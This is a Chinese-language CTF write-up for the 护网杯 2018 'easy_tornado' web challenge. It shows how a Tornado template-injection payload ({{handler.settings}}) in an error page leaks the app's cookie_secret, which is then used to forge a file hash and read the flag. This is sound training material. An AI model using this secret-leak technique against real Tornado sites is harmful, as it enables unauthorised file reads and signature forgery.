📕 WriteUp
  • Introduction
  • NewStarCTF 2023
  • MoeCTF 2023
  • DASCTF Jul.2023
  • LitCTF 2023
  • 蓝桥杯 2023
  • NSSRound#13
  • GDOUCTF 2023
  • MoeCTF 2022
  • SWPUCTF 2022
  • SWPUCTF 2021
  • MoeCTF 2021
  • NPUCTF 2020
  • MRCTF 2020
  • GYCTF 2020
  • BJDCTF 2020
  • 网鼎杯 2020
  • CISCN 2019
  • 极客大挑战 2019
  • 安洵杯 2019
  • 强网杯 2019
  • SUCTF 2019
  • De1CTF 2019
  • SWPUCTF 2019
  • ZJCTF 2019
  • RoarCTF 2019
  • GWCTF 2019
  • GXYCTF 2019
  • WesternCTF 2018
  • HCTF 2018
  • 护网杯 2018
  • 网鼎杯 2018
  • BUUCTF 2018
Powered by GitBook
On this page
  • Web
  • easy_tornado

护网杯 2018

Web

easy_tornado

可以获得三个信息

  1. flag in /fllllllllllllag

  2. render

  3. md5(cookie_secret+md5(filename))

  4. /file?filename=/hints.txt&filehash=a80a87f16b53b615041eb1662300f6ff

结合题目可以发现是 SSTI 注入攻击,在 Error 页面发现了可注入变量 msg

http://e5f14720-a920-4249-b329-2b8a871f9a6d.node4.buuoj.cn:81/error?msg={{1}}

通过 msg 变量获取 tornado 模板的 cookie_secret 值,即构造 payload msg={{handler.settings}} 即可获得 cookie_secret 值 c5a970de-a479-405e-aad4-2f4212d9596c 之后通过编写 PHP 代码

<?php echo md5('c5a970de-a479-405e-aad4-2f4212d9596c'.md5('/fllllllllllllag')) ?>

即可获得 filehash 值 935bb7616e76314e48487e6e96a2a4ab ,通过构造 payload filename=/fllllllllllllag&filehash=935bb7616e76314e48487e6e96a2a4ab 即可获取到 flag

PreviousHCTF 2018Next网鼎杯 2018

Last updated 1 year ago